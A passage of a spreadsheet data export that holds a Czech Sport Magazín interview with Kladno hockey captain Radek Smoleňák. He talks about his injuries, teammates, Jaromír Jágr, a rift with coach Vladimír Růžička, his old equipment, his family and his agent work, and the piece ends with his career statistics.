kontakt pozitivně neobohacuje, jen stresuje. Zdroj: Státní zdravotní ústav ( SZÚ ) Autor: TEXT: JAN BOHATA FOTO: PROFIMEDIA Autor Jan Bohata</t>
  </si>
  <si>
    <t>93470</t>
  </si>
  <si>
    <t>20241101_662_3239753710_b32d1d0fd852c74d07a3.html</t>
  </si>
  <si>
    <t>b32d1d0fd852c74d07a3</t>
  </si>
  <si>
    <t>MĚ UŽ NIC NEURAZÍ</t>
  </si>
  <si>
    <t>MĚ UŽ NIC NEURAZÍ Rubrika: R O ZH O VO R Vyslovte jeho jméno u soupeřů a moc hezkých slov neuslyšíte. Svým pojetím a neohrožeností je dráždí. Ale právě tím, jak bojuje za tým, získal respekt. „Už není žádná nadávka, která by mě dokázala urazit,“ reaguje hokejový útočník Radek Smoleňák , 37letý kapitán Rytířů. Světoběžník, jenž se na sklonku kariéry vrátil domů. Mluví o kladenské renesanci, suspenzoru od dětství i o tom, proč se rozhádal s koučem Vladimírem Růžičkou . Hokej hrál profesionálně v osmi zemích, nakoukl do NHL , chvíli byl i kapitánem reprezentace. Málokdo se může pochlubit tak pestrým hokejovým životopisem. „I proto chci všechno zúročit jako agent,“ říká muž, jenž tuto roli vykonává už teď. Jeho kancelář je v mlýnici před brankou. Tam na něj nikdo nemá. Nechává se mlátit i přesto, že nosí pravěkou výstroj. V Kladně mu to navíc pálí, v době uzávěrky Sport Magazínu se pohyboval mezi top třemi střelci (8 gólů) i v desítce produktivity (12 bodů). Už je to pár let, kdy jste mi říkal, že vám lékaři skoro zakazují hrát. A podívejte se… „Je pravda, že nejlepší doktoři v republice mi říkali, že to vůbec není dobrý na jakýkoliv sport. Bylo to zvláštní období. Ale nakonec jsem všechny negativní zprávy překonal a hraju dál. Možná už trochu přesluhuju.“ Na to, že jste kvůli kyčlím i na normální chození měl berle, hrajete celkem dobře, ne? (smích) „Musím zaklepat, jsem opravdu fit. Žádnou bolest necítím. Užívám si to. Vím, že jedu nad zdravotní plán. Kyčle jsem dost řešil, vracelo se mi to. Ale teď je to v pohodě. Hraní mě baví možná ještě víc, protože vím, že se blížím k bráně, kterou za chvíli budu zavírat.“ Od lékařů máte zelenou? Neriskujete moc? „Bylo období, kdy jsem nemohl ani chodit, do toho jsem si ještě zlomil patu. Fakt na prd. Sami doktoři jsou překvapení, že se pořád na určité úrovni hýbu a tělo funguje. Jsem opravdu vděčný, že hokej můžu mrskat. Kdybych nevěděl, čím vším jsem si prošel, tak aktuálně to podle těla nepoznám. Nic necítím, co se týče kyčlí. Takže super.“ Nemáte ani obavy, že se přihlásí po kariéře? „Aktuálně mě to vůbec neomezuje. Ale bůhví, co bude, protože moc dobře vím, že moje tělo za těch dvacet let hraní dostalo hrozně na prdel. O tom není pochyb.“ Bylo někdy období, kdy jste si říkal, že skončíte? „Tak blízko rozhodnutí, co se týče zdraví, jsem nikdy nebyl.“ Ani před třemi lety, kdy vás odstavili v Hradci Králové ? „Vůbec ne. Naopak! To mě ještě nakoplo, protože jsem věděl, že tak končit nechci.“ Jak to myslíte? „Aby mi někdo jiný řekl, že na to nemám, nebo o tom takhle vypráví. Já chci končit, až si to řeknu sám. Na to jsem soudnej dost. Od nikoho si nenechám vnucovat negativní myšlenky.“ Takže to pro vás byla spíš pozitivní motivace. „No jasně. Myslím si, že jsem na to celkem dost chytrej. V životě to mám tak, že když mi někdo říká, že to nejde, tak mě to naopak nakopne. Já totiž nesnáším slovo nejde! Pokud slyším, že něco nedokážu nebo neumím, naopak je to pro mě motor, ať si svůj názor strčí do zadku. V tomhle jdu vždycky proti zdi.“ Nešel jste proti zdi i tím, když jste se vrátil do Kladna v době, kdy bylo u dna? „Bylo to jiné v tom, že jsem předtím působil v Hradci , který okupoval jiné příčky, ambice byly velké. Rytíři se motali dole, nebylo to nic moc. Nejsem blbej, věděl jsem, do čeho jdu. Ale i tak to pro mě byla obrovská motivace a lákadlo.“ V čem? „Že si po spoustě let zahraju doma. Už jsem nechtěl rodinu tahat nikam jinam, můžeme být v baráku, mám tady kamarády. Vždycky jsem věděl, že mám ke Kladnu závazek, protože mi otevřelo bránu do hokeje. Vychovalo mě i lidsky. Takže jsem se ohromně těšil. Když jsem rozvázal spolupráci v Hradci , tak to ze mě úplně spadlo. Bylo to až takové…“ Jaké? „Šlo o hodně silný zážitek. Natočil jsem emotivní video, kde jsem se s fanoušky rozloučil, ukápla i slza. Byl to pro mě fakt těžký. Ale živě si vybavuju, že v momentě, kdy už jsem měl sbaleno a sednul jsem do auta, najednou jsem měl takový zvláštní pocit, který jsem předtím nezažil. Říkal jsem si: Tak jo, jedu domů. Konečně!“ Bylo to až něco mystického? „Neříkám, že jsem spirituálního založení, ale tohle byl opravdu výjimečný zážitek. Velká úleva. Celý to ze mě spadlo.“ Je pořád začátek sezony, nemá cenu dělat unáhlené soudy. Ale pohled na kladenskou bilanci vás musí těšit? „Kdyby nám někdo řekl, kde se budeme pohybovat po první čtvrtině, tak bychom to pochopitelně brali. Je jasný, že se zase nechceme plácat dole. Jenže letos je fakt brutální, jak je extraliga našlapaná. Prohrajete nebo vyhrajete dva, tři zápasy a jste ve čtyřce, nebo taky u dna. Je to hrozně našťouchaný. Což si myslím, že je super pro fanoušky.“ Pořád se něco děje. „Jo. Podle mě tohle lidi baví. Že poslední porazí prvního. A dopředu nikdy nevíte. Podle mě nechtějí vidět, že Pardubice vyhrajou čtyřicetkrát v řadě… Ne. Pro fanouškovskou základnu je lepší, když Dynamo přijede do Budějek a odjede s debaklem 1:6. Pokud bych to měl vzít z pohledu diváka, je to přece skvělý.“ Takže je musí bavit i to, že Kladno , které hrálo baráž třikrát za sebou, teď dokáže porážet giganty. „Pro nás je samozřejmě parádní, že se motáme v patrech, které Kladno dlouho nezažilo. Cítím, že i mezi lidmi tady je najednou větší hlad po hokeji. Jsou na nás po dlouhý době pyšní. Nechci nic zakřiknout. Je to ošidný, člověk se ani nenadechne a je rychle zase dole. Ale mám z toho radost.“ Vnímáte to jako kladenský patriot o to víc? „No jasně. Ono se to těžko vysvětluje. Pokud někde vyrůstáš a potom za ten tým hraješ, je to jiný. Neříkám, že kluci, kteří jsou odjinud, to mají u zadku. V žádným případě. Ale pro mě je to srdcovka. Budu v Kladně žít dál, mám kluky, kteří tady hrají. Takže na hokeji jako takovým mi záleží. Na mládeži, na všem. Jsem rád, že teď hokeji děláme aspoň trochu reklamu a lidi na stadion dostáváme ve větším počtu.“ Jaké pro vás bylo, když jste chvíli po návratu převzal po Tomáši Plekancovi , který skončil kariéru, kapitánské céčko? „Pleky vycítil, že už je jeho čas, když jsem přišel. Asi se mnou nechtěl hrát. (smích) Zdraví mu to nedovolilo, což mě trochu mrzelo, protože jsem s Plekym vždycky byl v kontaktu a těšili jsme se, že si spolu zahrajeme. Bohužel k tomu nedošlo. Padlo to tedy na mě. Je to pro mě vzácný. Jak jsem tady vyrůstal, vnímal jsem kapitány jako Pavla Pateru , Pepu Zajíce, potom i Plekyho. Vždycky to byla silná jména. A že jsem s nimi v tom pomyslném balíčku, pro mě hodně znamená. Byli to moji hrdinové.“ Kdo vás nejvíc ovlivnil? „Patýs ( Pavel Patera ) byl vždycky můj nejoblíbenější hráč. Což platí i dodnes. Ale pokud jde o hráčskou pozici, jsem pořád stejný hráč, jako bych to céčko neměl. Těžko se budu měnit. Mám rád zodpovědnost, neschovávám se. Chci být v popředí, být prostě hráčem, který je první na odstřel. Jdu s hlavou na špalek. A jestli jsem kapitán, nebo ne, není až takový rozdíl.“ Přemlouval jste před rokem Plekance , aby ještě pokračoval? „To bylo jeho rozhodnutí. Kdo jinej by to měl vědět než Pleky. Ale vždycky, když ho vidím nebo se sem přijde podívat, ho hecuju, jestli ho nesvrbí ruce a jestli si to nechce se mnou ťuknout. Tak pokaždé odpoví, že se mnou rozhodně ne. (smích) Hned se zapojil k repre, udělali obrovský úspěch v Praze , má velkou rodinu. Takže si myslím, že je spokojený.“ Když jsme u těch narážek na vaši hru, jak vnímáte podobné vtípky? Třeba Jaromír Jágr si vás s oblibou dobírá, že nemáte talent, nejde vám to, ale držíte se u toho zuby nehty… „No jéjej, takových hlášek je…“ Nevadí vám? „Ani ne. Lidi to říkají, protože dobře vědí, že se neurazím. Ví, že rád přijímám, ale i rozdávám. Srandu miluju, takže se tomu zasměju. A hlavně, dokážu být soudnej a sám moc dobře vím, jaký jsem hráč. Neskromně řeknu, že jsem jeden z nejlepších kolem brány. Tohle je to první, co lidi napadne. Vím, že jsem na ledě, s prominutím, kurva. Že mě nenávidí všude, kam přijedu. Většinou na mě celý stadion řve, že jsem ču…“ A to vás ještě víc nabudí. „No jasně. Mám v sobě velký emoce, všechno prožívám. Chci vyhrávat! Na druhou stranu vím, že na ledě polochodím, nejsem kdovíjak rychlej. Nejsem Pastrňák, abych dělal kličky mezi nohama. Vím, kam patřím, jaký jsem hráč. A rád si z toho sám udělám srandu. Takže si nemyslím, že by mě něco dokázalo urazit, protože lidi mají většinou pravdu.“ Myslíte, že jste to dotáhl díky vůli dál, než na co jste měl talent? „Vím moc dobře, že kdybych s tím, jaký jsem hokejista, teď začínal, asi bych nehrál profesionální hokej. Protože ten je úplně jinde. Já jsem vychytal dobu, kdy to nebylo tak rychlý, hráči nebyli tolik šikovní, neměli dovednosti jako dneska. Na tu dobu jsem byl, myslím, dobrej. Ale můj talent se absolutně nedotýkal dalších kladenských kluků jako Frolda ( Michael Frolík ), Voras ( Jakub Voráček ) nebo Tlusťoch (Jiří Tlustý). Ti byli úplně někde jinde.“ Takže rozhodla vaše vůle. „Myslím, že jsem si to celý vydřel. Spousta situací byla na prd, ale nějak jsem se s tím dokázal vypořádat a ze všeho jsem vyždímal maximum. Jo, byly věci, které jsem mohl udělat jinak, třeba bych měl kariéru lepší, ale za sebe musím pokorně uznat, že i tak byla fantastická. Možná je v tom něco pravdy, že na to, co umím, byla skvělá a spousta kluků by si to se mnou vyměnila.“ Zahřeje u srdce i to, že i když je vaše síla v práci před brankou, dostal jste se i do popředí bodování extraligy? „Víte, co mi přijde vtipný?“ Že se na to ptám? „Že všichni berou jako senzaci, že umím dát gól. (smích) Ale když se člověk podívá na moji statistiku, vždycky jsem byl schopný dát kolem dvaceti branek za sezonu a byl jsem v popředí bodování. Nechci, aby to vyznělo namachrovaně, ale pro mě to překvapení není.“ Je to asi tím, že jste byl v posledních letech ve škatulce bojovníků. „Přesně tak. Jsem rád, že nám to s Ríšou Jarůškem a Tondou Melkou sedlo. Nehrajeme samozřejmě nic moc krásnýho na pohled, že bychom si to strkali po super kličkách, ale těší mě, že jsme schopní pomoct týmu.“ Je vidět i rozdíl v sebevědomí. Třeba Melka si s pukem dovolí mnohem víc než v minulých letech… „To jo. Našli jsme se, jde nám to. Za což jsem vděčný, užívám si to, protože každý chce být nápomocný. Ale chci se vrátit k Tondovi.“ Melkovi? „Ano. Když se o něm bavíme, prošel si spoustu sezon v první lize, vždycky byl na pokraji sestavy. Šel hrát pár minut, spíš oslabení. My se známe dlouhý roky, ale v týmu jsem s ním nikdy nehrál. Když teď hrajeme spolu a začal jsem ho víc vnímat, tak za mě je jednoznačně náš MVP, tedy nejužitečnější hráč. Protože dělá tolik věcí, které z tribuny vůbec nejsou vidět a lidi o nich netuší. Je neskutečně platný, hraje se mi s ním výborně. A s Ríšou (Jarůškem) taky.“ Také on zaznamenal velký progres. „Minulý ročník mu extra nesednul, představoval si ho jinak. Ale začal si víc věřit, dostal větší čas na ledě, vnímá důvěru a daleko víc dokáže využít toho, v čem je dobrý. Nezkouší zbytečně věci, které nejsou pro něj. Všichni tři jsme si sedli, uvědomili jsme si, kdo je v čem dobrý, a děláme to, co umíme. Mám radost i za ně.“ Dokáže vás ještě za ty roky nějaká nadávka vytočit? Překvapit? „Mě už nic nerozhodí. Fakt ne. Kolikrát se tomu zasměju, když na mě někdo z protihráčů něco zařve. Nebo když je vtipnej. Ale opravdu netuším, co by se muselo stát, aby mě nasral. Každý mi může nadávat do kohokoliv. Protože já to nikdy neberu osobně. I já můžu klukům nadávat do rodin, do všeho, je mi to jedno. Ale všichni ví, že po zápase vezmu ty kluky na pivo a jsem s nimi oukej.“ To asi ne každý umí. „Vím o hráčích, kteří se urazí a berou to osobně. Že to, co se stane na ledě, je i v reálu. Ale tak to přece vůbec není. Jenže to už je jejich boj.“ Dokážete toho někdy využít? „No jasně. Za ty roky už dobře vím, kdo je v lize labilní. Vím, na koho co platí. Ale ono to někdy není těžký poznat, kdo je trošku dámička.“ (smích) Užíváte si momenty, kdy jste před brankou, všichni do vás buší, ale vy stejně neuhnete? „Jak už jsem zmínil – neskromně vím, že jsem v tom dobrej. A musím tam být. Protože to nikdo nechce dělat, přitom to přináší ovoce. Neříkám, že z toho vždycky dám gól, ale minimálně udělám nějaký rozruch, který ostatním spoluhráčům pomůže. Vím, že to je moje parketa.“ Musíte i tohle pořád trénovat? „Samozřejmě. Člověk musí všechno neustále pilovat, jinak je v pytli. V jakémkoliv věku. I po tréninku stojím před brankou a kluci na mě pálí. Nebo zkouším další jiné fígle. Každou dovednost je třeba trénovat. Zeptejte se kluků, kteří hráli s Ovečkinem, kolikrát golfákem po tréninku pálil na branku. A kolikrát ji trefil.“ Co nejvíc bolí, když při zápasech stojíte právě před brankou? „Taková klasika. Krosčeky do zad, sekery, ale to jsou běžný oděrky, které vůbec neřeším. Ani to nevnímám. Prostě mám modřiny, ale to je normální.“ Netrpíte bolestí ještě víc, protože máte na sobě výstroj z počátku kariéry? „Je stará, ale kvalitní. Třeba moje vesta, ještě úplně původní, bílá, od Jofy. Už je to rarita.“ Odkdy ji máte? „Od prvního roku v juniorce v OHL. Takže dvacet let. Stejně jako kopny a lokty. No, a když už jsme u toho, tak suspenzor mám úplně odmalička.“ Počkejte, opravdu? „Nekecám.“ Pořád drží? „Ten plast mám stejný, jenom měním látku, ve které je schovaný.“ Ale i citlivé partie od mládí prošly vývojem, ne? „Abych to vysvětlil. On mi ten suspenzor byl větší, když jsem byl ještě malej. Potom jsem do něj dorostl.“ (smích) Dobrá… A co další část výstroje? Proč ji neměníte? „Kolikrát jsem měl tendenci, že si vyzkouším něco nového, už jsem si to i nafasoval. Ale po chvíli se prostě vrátím k tomu starýmu. To je stejné jako s hokejkami. Mám stejný model ještě z Finska , když jsem hrával za Pori , což je nějakých třináct let. Nebo brusle. Mám je stejné od sedmnácti let. Akorát vždycky vymění design, ale jinak jsou pořád stejný. Jsou to takový těžký lyžařský přezkáče. I helmu mám starou.“ Je to síla zvyku? „Asi jo. Stejný to mám v životě. Když mám něco rád, nepotřebuju si pořád pořizovat něco novýho. Mobily nebo tak. Jsem spokojený s tím, co mám.“ Nemáte obavy, že se výstroj při zápase na vás rozpadne? „Ne. Těch pět let, co ještě budu hrát, to vydrží! (smích) Je pravda, že zápasový trenky mi drží jenom na takovou gumičku. A když přijde někdo nový, kdo mě nezná, tak na to čumí, vyvalí oči a říká: Ty vole, co to máš na sobě? Dělají si ze mě srandu. Ale každý má prostě nějaký fetiš, já mám tohle. (smích) Snaha to vyměnit byla, ale nikdy k tomu nedošlo.“ Jaké to je dělat kapitána týmu, v němž stále hraje majitel Jaromír Jágr ? Zdá se, že jste rychle našli společnou řeč. „Jo jo. Známe se dlouhé roky, odehráli jsme i jedno mistrovství a dalších pár zápasů v reprezentaci. Víme o sobě hrozně dlouho. Ale taky jsem byl zvědavý, jak to bude vypadat, protože jsem ho nikdy nezažil na dennodenní bázi v klubu. V nároďáku přijel, odjel.“ A jaké to je? „Cestu k sobě jsme si našli celkem rychle. Pokud řešíme Kladno , většinou najdeme shodu. Často to řešíme, protože nám oběma na klubu hodně záleží, máme jeden cíl. V tomto ohledu nám komunikace funguje skvěle. Vím, že mu vždycky otevřeně můžu říct, co si myslím. A Džegr zase mně. Není to tak, že kolem sebe našlapujeme opatrně. Jdeme přímo na věc a víme, že to oba myslíme upřímně a říkáme si, jak věci jsou. Čehož si vážím.“ Ale taky do sebe dokážete hodně zajíždět, že? „No jasně. Taky je to jenom člověk, který se rád zasměje. A řekl bych, že máme i podobný styl humoru. Takže na sebe pořád něco máme.“ Je vidět, že mu to na ledě oproti minulé sezoně o dost víc jezdí. „Už jsem o tom mluvil během léta. Předtím byl zraněný, kdežto poslední letní přípravu odjel kompletně s námi. Dřív se stávalo, že si třeba sednul na střídačku, chvíli odpočíval, ale teď opravdu nevynechal nic. Jel všechno stoprocentně. Takže i ty naježděné minuty a kilometry musejí být znát.“ Můžete se vrátit k tomu, co se stalo mezi vámi a koučem Vladimírem Růžičkou v Hradci ? Předtím jste mívali skvělý vztah. „Já ho měl vždycky hodně rád a myslím si, že on mě taky. Ať se stalo cokoliv, budu mu vždycky vděčný za to, že mi dal extrémní šanci v reprezentaci, kterou jsem od nikoho jiného nedostal. Maximálně jsem byl nějaký štěk. Takže na tohle nezapomenu.“ Jenže se něco přihodilo při působení v Mountfieldu . „I tam to bylo zezačátku fajn, ale pak se stala jedna situace, o které nechci mluvit, protože to bylo v kabině. Nechci nic vynášet. Třeba se mýlím, ale z mého pohledu to byla věc, která to celé otočila o 360 stupňů. Od té doby už to nebylo dobrý, hlavně lidsky. Věděl jsem, že spolu nemůžeme fungovat. Řekl jsem nahlas, že prostě půjdu já, což bych chápal, protože nikdo není víc než tým, nebo Růža. Myslím si, že on to cítil stejně, že spolu dál nemůžeme být.“ Což se také stalo, Růžička po sezoně 2020/21 skončil. „Podle mě to bylo dané i tím, že jsme oba silné povahy. Tedy v tom smyslu, že si nenecháme srát na hlavu. Což je dobrá vlastnost. Zákonitě jsme si každý stáli za svým. Přesto si myslím, že mi bylo lehce křivděno, ale tak to prostě je. Hokej není fér. Ani život někdy není fér. Není to tak, že bych na Vláďu Růžičku myslel každý den a přehrával si v hlavě, co se stalo. Jedu dál. I takové věci k hokeji patří. I Růža toho zažil spoustu. Takže mu jenom přeju, aby byl zdravý, aby se dařilo jemu i celé rodině. Není to tak, že bych doma měl kvůli němu vúdú panenku.“ Viděli jste se od té doby? „Mám dojem, že ne. On potom trénoval Litvínov , ale nepotkali jsme se. Já bych asi neměl problém ho pozdravit, ale někde vzadu mám pořád věci, které jsme řešili, a jeho chování. Takže zase nejsem úplně splachovací. Ale ani ten, kdo…“ (přemýšlí) Kdo nedokáže odpustit? „Nejsem sebestředný idiot, abych se s někým nebavil do konce života kvůli tomu, že jsme měli na nějakou věc jiný názor.“ On z vás udělal v přípravě na domácí šampionát 2015 kapitána, ale potom jste na turnaji skončil na tribuně. A i Jágr vám to neustále předhazuje v rámci špičkování. „No jo, to mám od něj na talíři pořád. Od kapitána do hlediště.“ Jak na to vzpomínáte? „Během sezony v rámci Euro Hockey Tour jsem byl kapitán. Potom přijel Voras ( Jakub Voráček ) a vzal mi to, no… (smích) Pamatuju si dobře jednu vtipnou situaci. Hráli jsme přípravu ve Znojmě , na pokoji jsme byli pochopitelně s Vorasem. Usínám, a já mu ze srandy říkám: Hele, uznáváš mě jako kapitána nároďáku? On se na mě podíval a povídá: Upřímně jako kámoš, rozhodně ne!“ (smích) To on byl v Praze kapitán. „Asi za dva dny jsme měli trénink v O2 areně, kde Růža oznámil, že to bude Voras. Tak jsem se na něj podíval a z legrace říkám: Tak tady to máš, vole. Doteď ka z toho máme srandu.“ Vaše kladenská partička, v níž jsou ještě Michael Frolík , Ondřej Pavelec a Jiří Tlustý, pořád drží pevně při sobě, že? „Jasně. To jsou přátelství na celý život. Známe se přes 25 let, každej jsme hodně jinej, ale pořád se vídáme, máme neskutečnou partu. V životě už jsme se posunuli, máme širší záběr, ale neustále něco podnikáme. Jezdíme na naše typické Mácháče, v posledních letech bereme děti na expedici Apalucha, přidal se k nám i Jirka Sekáč, je to super pánská jízda. Neskutečně si to užíváme. Vím, že kdybych potřeboval s něčím pomoct, kdokoliv z kluků je tady pro mě. A naopak. Moc si toho kamarádství vážíme.“ Museli jste hodně pomáhat Voráčkovi , když musel nečekaně skončit s hokejem? „Určitě to pro něj nebylo jednoduchý, není na světě všechno jenom růžový. Někdy jsou to i vážná témata, co řešíme, ale snažíme se to nějak odlehčit. Vždycky se to přetočí v humor.“ Tušil jste, že brankář Ondřej Pavelec sekne s kariérou tak brzo? Už ve 31 letech? „Pamatuju si, když nám bylo osmnáct a hráli jsme v juniorce, tak jsme si volali a on povídal: Hele, Smoli, já se na to ve třiceti vykašlu. Já se jenom smál, ale on to měl v sobě vždycky. Nešel přes závit. Což se mi taky líbí. Prostě řekl: Končím - a bylo mu jedno, co si myslí ostatní. A podívejte se, jak se vypracoval. Je respektovaný trenér gólmanů v nároďáku, v Praze vyhráli zlato. Já mu to jenom přeju. Odvádí výtečnou práci.“ Ve vaší partě musí být člověk neustále připravený na nějaké narážky, že? „Pořád. To jsou neuvěřitelný bomby, jaký jedeme. Musíme umět přijímat, ale i rozdávat. Jakmile ukážeš, že jsi slabý článek, okamžitě ostatní zaútočí. (smích) Protože za ty roky už o sobě víme opravdu všechno. Kolikrát si říkám, že kdybychom sepsali pár knížek, bylo to čtenější než Harry Potter. Pořád se chováme jako puberťáci.“ I z vás už je dvojnásobný táta, podle fotek na sociálních sítích si to náramně užíváte. „Neskutečně. V tomhle jsem možná až trochu blázen, i moje paní Hanka si dělá srandu, že jsem až magor. Protože to jsou jenom děti, děti… Já jsem si je vždycky přál. A moji dva kluci, kterým jsou tři a pět, jsou pro nás největší dar. Veškerý čas mimo hokej trávím s nimi, neustále něco podnikáme, vůbec nesedíme doma, nepoleháváme. Jsem na ně neskutečně pyšnej, beru je hodně i do kabiny. Vždycky jsem chtěl být táta.“ Kvůli tomu už jste zakotvil v Česku a skončilo putování po světě? „Tohle jsem měl vždycky v hlavě. Až se bude chýlit konec, vrátím se domů. Moje priority už jsou hozený trochu jinam. Pro hokej i pro Kladno udělám vždycky maximum, to asi nemusím ani zdůrazňovat, ale jsou i důležitější věci. Právě rodina.“ Jste rád za respekt, který jste si v lize za celou kariéru vybudoval? „Myslíte ty nadávky, co neustále někde slyším? Nemyslím si, že bych byl nějaká tvář ligy nebo vyprodával stadiony. Od toho máme v týmu jinýho Jardu . (smích) Ale je pravda, že už mám něco za sebou. A i když na mě řvou fanoušci i protihráči, tak ví, že vždycky dělám jenom to, abych pomohl týmu. Možná i rozhodčí už vnímají, že tady hraju dlouho. Jinak to moc nevnímám. Ostatní kluci mi na ledě tykají. I ti smradi mladí…“ (smích) Zmínil jste sudí. I u nich už víte, na koho můžete být při komunikaci drsnější, na koho ne? „To ani ne. Vím, že jsou hráči, kteří se před zápasem dívají, kdo píská, aby věděli. Ale když skončí utkání, nemám vůči rozhodčím zášť. Myslím si, že se k nim chovám slušně. Tu a tam řvu, ale neurážím je sprostě, protože to jsou taky lidi. Každý chybujeme. Stejně jako já něco poseru na ledě, oni občas taky. Ale jsem přesvědčený, že to nikdy nedělají naschvál. Za ty roky už mě znají, takže dobře ví, že občas prohodím nějaký vtípek. Ale myslím, že na ně nehalekám nějak moc.“ Jak se mění extraliga během let? „Jsem hlavně rád, jak se v posledních dvou letech vracejí výborní čeští kluci. Je to dané hlavně financemi. Liga je na parádní úrovni, skoro každý klub má někoho, na koho se lidi přijdou rádi podívat. I pro mladý kluky je zážitek vidět borce jako Červenka, Sedlák. Kvalita ligy stoupá. Dřív se podceňovala, říkalo se, že není dobrá… Přitom extraliga je extrémně těžká soutěž, silová. Takže jsem rád, že ji ještě hraju.“ Jak dlouho ještě budete? „Neřeším to, beru to ze dne na den. Zdraví mě naučilo neplánovat. Po sezoně mi končí smlouva, uvidíme. V klidu si sedneme a uvidíme, jestli to má cenu, nebo ne. Třeba mě Džegr bude na kolenou přemlouvat, abych hrál dál. (smích) Taky si to musíme vyhodnotit doma s Hankou. Teď řeším jenom aktuální sezonu a za tým můžu říct, že se popereme o to, abychom už nehráli na spodku.“ „PRO MĚ JE TO SRDCOVKA. BUDU V KLADNĚ ŽÍT DÁL, MÁM KLUKY, KTEŘÍ TADY HRAJÍ. NA KLUBU MI ZÁLEŽÍ. JSEM RÁD, ŽE TEĎ HOKEJI DĚLÁME ASPOŇ TROCHU REKLAMU.“ „CO BYLO S VLÁĎOU RŮŽIČKOU? STALA SE JEDNA SITUACE, KTERÁ TO CELÉ OTOČILA O 360 STUPŇŮ. OD TÉ DOBY UŽ TO MEZI NÁMI NEBYLO DOBRÝ. “ „JSEM SOUDNEJ. NA LEDĚ POLOCHODÍM, NEJSEM KDOVÍJAK RYCHLEJ. NEJSEM PASTRŇÁK, ABYCH DĚLAL KLIČKY MEZI NOHAMA. VÍM, KAM PATŘÍM, JAKÝ JSEM HRÁČ.“ „NESKROMNĚ ŘEKNU, ŽE JSEM JEDEN Z NEJLEPŠÍCH KOLEM BRÁNY. VÍM, ŽE JSEM NA LEDĚ, S PROMINUTÍM, KURVA. NENÁVIDÍ MĚ VŠUDE, KAM PŘIJEDU.“ „NESNÁŠÍM SLOVO NEJDE! POKUD SLYŠÍM, ŽE NĚCO NEDOKÁŽU NEBO NEUMÍM, NAOPAK JE TO PRO MĚ MOTOR, AŤ SI SVŮJ NÁZOR STRČÍ DO ZADKU.“ STŘELEC. I když se nejvíc nadře před brankou, dokáže i dávat góly. Zvlášť v této sezoně. KANCELÁŘ. U brankoviště je znát jeho největší síla. Proti Hradci , svému bývalému týmu, se tam potkal i s kladenským majitelem Jaromírem Jágrem . LEGRÁCKY. S kapitánem Rytířů nikdy není nuda. Třeba když vidí fotoreportéra Sport Magazínu. VYNDAVACÍ ZUBY. Takhle pózoval se svým chrupem při rozhovoru pro Sport Magazín před pěti lety. Vizáž od té doby nezměnil. KAMARÁD. S Jakubem Voráčkem jsou přátelé od dětství, předávali si i kapitánské céčko v národním mužstvu. NESHODY. S koučem Vladimírem Růžičkou si byli blízcí, ovšem při angažmá v Hradci se to zásadně pokazilo. SYNOVÉ. Rodina je pro něj vším, kluky často bere při děkovačce i na led. KAPITÁN. V kladenské kabině je šéfem, i když je jasné, že hlavní slovo má hrající majitel a nestárnoucí veterán Jaromír Jágr . REPREZENTACE. Zahrál si na domácím šampionátu v roce 2015. HRAJÍCÍ AGENT SMOLEŇÁK: BUDOU NOVÍ PASTRŇÁKOVÉ Co po kariéře? O tom už má Radek Smoleňák jasno. Bude dál pokračovat v práci agenta, kterou načal už během hraní. „Byl jsem čtrnáct let v cizině, zažil jsem si všechno možné, což je moje velká výhoda. Není situace, kterou bych neznal. Kluky na to můžu připravit,“ říká kladenský útočník, který splnil veškerá licenční kritéria a jeho společnost EFFORTSPORTS je vedená jako oficiální agentura uznávaná Českým hokejem. „Extrémně mě to baví. Postupně jsem si připravoval vizi, potom jsem se do toho pustil,“ přiznává světoběžník, jenž poznal elitní hokej v osmi zemích včetně NHL . „Což považuju za mou největší devizu, protože mladým klukům i rodičům říkám opravdu věci ze života. Myslím to s nimi upřímně. A oni vědí, že se na mě mohou kdykoliv obrátit. Ve všem. Nechci mít až tolik klientů, abych se opravdu každému mohl individuálně věnovat.“ Pochopitelně se domluvil s kladenským majitelem Jaromírem Jágrem , jestli do projektu může jít. „To pro mě byla alfa a omega, abych nedělal něco za jeho zády,“ tvrdí. I tak cítí, že jsou ostatní zavedenější agenti z jeho aktivit lehce nervózní, protože cítí konkurenci. Zatím se zaměřuje na talenty ve věkové hranici od třinácti do šestnácti let. „A musím říct, že někteří kluci jsou fakt extrémně šikovní. Nebojím se říct, že tam jsou noví Pastrňákové,“ hlásí Smoleňák . I když po zimácích při sledování ostatních zápasů tráví hodně času, svoje hraní nešidí. „To absolutně ne. Jsem profík, nikdo nemusí pochybovat, že Kladnu dávám maximum.“ 137 TOLIK GÓLŮ VSTŘELIL KAPITÁN KLADENSKÝCH RYTÍŘŮ VE 400 ZÁPASECH EXTRALIGY. NENÍ JENOM HRÁČEM PŘED BRANKU. SMOLEŇÁK V SEZONĚ zápasy 13 body 12 (8+4) průměrný čas na ledě 16:53 trestné minuty 6 *Data jsou k 24. 10. HOKEJISTA RADEK SMOLEŇÁK Věk: 37 (*3. prosince 1986 v Praze ) Pozice: útočník, křídlo Kariéra: Kingston Frontenacs (OHL, 2004-06), Springfield Falcons (AHL, 2006/07), Johnstown Chiefs (ECHL, 2006/07), Norfolk Admirals (AHL, 2007/08-10), Mississippi Sea Wolves (ECHL, 2007/08), Tampa Bay (2008/09), Chicago (2009/10), Abbotsford Heat (AHL, 2009/10), Sparta (2010/11), Kladno (2010/11), Ässät Pori ( Fin , 2011/12), Pelicans Lahti (2011-13, 2013/14), Timra ( Švéd ., 2012/13), Nižnyj Novgorod (KHL, 2012/13), Mansijsk (KHL, 2013/14), TPS Turku ( Fin , 2014/15), MODO ( Švéd ., 2014/15), Medveščak Záhřeb ( KHL , 2015/16), Slovan Bratislava (KHL, 2016-18), Mountfield HK (2018-23), Rapperswill ( Švýc. , 2018/19), Kladno (2023-?) Bilance v reprezentaci: 27 zápasů/2 góly Bilance v NHL : 7/1 (0+1) Bilance v extralize: 400/238 (137+101) Největší úspěchy: mistr extraligy U20 (s Kladnem 2003/04), stříbro ve finské lize (s Lahti 2011/12), bronz na MS U18 (2004) V TOLIKA ZEMÍCH SI ZAHRÁL RADEK SMOLEŇÁK V PROFESIONÁLNÍCH TÝMECH ( USA , KANADA, FINSKO , ŠVÉDSKO, RUSKO, ŠVÝCARSKO , CHORVATSKO, SLOVENSKO). FOTO SPORT: MICHAL BERÁNEK FOTO SPORT: MICHAL BERÁNEK , PAVEL MAZÁČ, PROFIMEDIA.CZ FOTO SPORT: MICHAL BERÁNEK FOTO SPORT: MICHAL BERÁNEK , PAVEL MAZÁČ Autor: TEXT: ZDENĚK JANDA zdenek.janda@cncenter.cz Autor Zdeněk Janda Rubrika transition_slide R O ZH O VO R</t>
  </si>
  <si>
    <t>149000</t>
  </si>
  <si>
